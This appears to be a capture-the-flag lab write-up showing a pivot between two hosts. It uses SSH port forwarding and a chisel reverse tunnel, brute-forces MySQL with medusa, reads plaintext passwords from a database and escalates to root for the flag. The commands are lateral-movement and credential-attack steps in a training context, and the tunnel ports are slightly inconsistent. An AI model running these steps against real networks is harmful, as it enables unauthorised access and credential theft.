 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.

 Last login: Mon Jul 19 20:23:18 2021 from 172.16.20.2
 mike@host2:~$

Check local ports of host2, mysql is running.

 mike@host2:/home$ ss -ntlp
 State               Recv-Q               Send-Q                              Local Address:Port                              Peer Address:Port              
 LISTEN              0                    80                                      127.0.0.1:3306                                   0.0.0.0:*                  
 LISTEN              0                    128                                 127.0.0.53%lo:53                                     0.0.0.0:*                  
 LISTEN              0                    128                                       0.0.0.0:22                                     0.0.0.0:*                  
 LISTEN              0                    128                                          [::]:22                                        [::]:*

We need to port forward 3306 outside, in order to brute force it.

First, on host1, we use ssh -L to map host2:3306 ==> host1:3306.

 root@host1:/home/mike/.ssh# ssh -g -L 3306:127.0.0.1:3306 mike@172.16.20.6 -i id_rsa

Check ports of host1, 3306 is open.

 root@host1:~# ss -ntlp
 State   Recv-Q   Send-Q      Local Address:Port      Peer Address:Port                                                                            
 LISTEN  0        128         127.0.0.53%lo:53             0.0.0.0:*       users:(("systemd-resolve",pid=138,fd=13))                              
 LISTEN  0        128               0.0.0.0:22             0.0.0.0:*       users:(("sshd",pid=199,fd=3))                                          
 LISTEN  0        128             127.0.0.1:3306           0.0.0.0:*       users:(("ssh",pid=1870,fd=5))                                          
 LISTEN  0        128                     *:80                   *:*       users:(("apache2",pid=613,fd=4),("apache2",pid=602,fd=4),("apache2",pid=592,fd=4),("apache2",pid=457,fd=4),("apache2",pid=375,fd=4),("apache2",pid=270,fd=4),("apache2",pid=269,fd=4),("apache2",pid=268,fd=4),("apache2",pid=257,fd=4))
 LISTEN  0        128                  [::]:22                [::]:*       users:(("sshd",pid=199,fd=4))                                          
 LISTEN  0        128                 [::1]:3306              [::]:*       users:(("ssh",pid=1870,fd=4))  

Then we need to map host1:3306 outside to kali, but host1 has limits, so ssh and socat all don't work. We have to use chisel.

On kali, run chisel server.

 ~ ./chisel server -p 8080 --reverse  
 2021/09/01 13:26:59 server: Reverse tunnelling enabled
 2021/09/01 13:26:59 server: Fingerprint QJGGHnimzCp6x3qmFZtvSyGo1ycXNZT7o9iyG537DF8=
 2021/09/01 13:26:59 server: Listening on http://0.0.0.0:8080

Then on host1, run chisel client.

 root@host1:~# ./chisel client http://192.168.33.128:33060 R:3306:127.0.0.1:33060

Now check port of kali, port 3306 is open.

The path is: kali:3306 ==> host1:3306 ==> host2:3306.

 ~ ss -ntlp                                                                                                                                                          
 State                    Recv-Q                   Send-Q                                     Local Address:Port                                     Peer Address:Port
 LISTEN                   0                        50                                             127.0.0.1:9614                                          0.0.0.0:*  
 LISTEN                   0                        511                                            127.0.0.1:6463                                          0.0.0.0:*  
 LISTEN                   0                        4096                                                   *:3306                                                *:*  
 LISTEN                   0                        4096                                                   *:8080                                                *:*  

Use medusa to bruteforce password of mysql on kali.

 ~ medusa  -h 127.0.0.1 -M mysql -u mike -P /usr/share/wordlists/rock_ascii.txt -t 50
 Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
 ...
 ACCOUNT FOUND: [mysql] Host: 127.0.0.1 User: mike Password: password [SUCCESS]
 ...

Next on host2, login mysql, get password of root.

 mysql> select * from users;
 +-------+---------------------+
 | login | password            |
 +-------+---------------------+
 | root  | bjsig4868fgjjeog    |
 | mike  | WhatAreYouDoingHere |
 +-------+---------------------+
 2 rows in set (0.00 sec)

Su to root on host2. Found mike.zip in /root.

 root@host2:~# ls -la
 total 28
 drwx------  4 root root 4096 Jul 19 20:35 .
 drwxr-xr-x 22 root root 4096 Jun 29 08:07 ..
 lrwxrwxrwx  1 root root    9 Jul 19 20:32 .bash_history -> /dev/null
 -rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
 drwxr-xr-x  3 root root 4096 Jul 15 14:47 .local
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 drwx------  2 root root 4096 Jul 15 14:41 .ssh
 -rw-------  1 root root  218 Jul 16 02:26 mike.zip

Unzip mike.zip with password from database. Get final flag.

 oot@host2:~# unzip mike.zip
 Archive:  mike.zip
 [mike.zip] mike password:
  extracting: mike                    
 root@host2:~# cat mike
 THM{_Y0U_F0UND_TH3_C0NTA1N3RS_}
 root@host2:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 host2